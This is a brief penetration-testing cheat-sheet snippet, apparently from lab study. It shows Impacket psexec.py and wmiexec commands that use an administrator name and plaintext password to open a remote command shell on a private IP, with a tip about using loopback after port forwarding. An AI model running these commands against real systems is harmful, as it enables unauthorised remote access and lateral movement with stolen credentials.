psexec.py 'administrator:Welcome1!@192.168.0.16' cmd <-----administrator is the user - Welcome1! is the password - 192.168.0.16 is the remote IP, keep in mind, if you portfwd, you can use loopback address as the IP impacket-wmiexec 'administrator:Welcome1!@127.0.0.1' cmd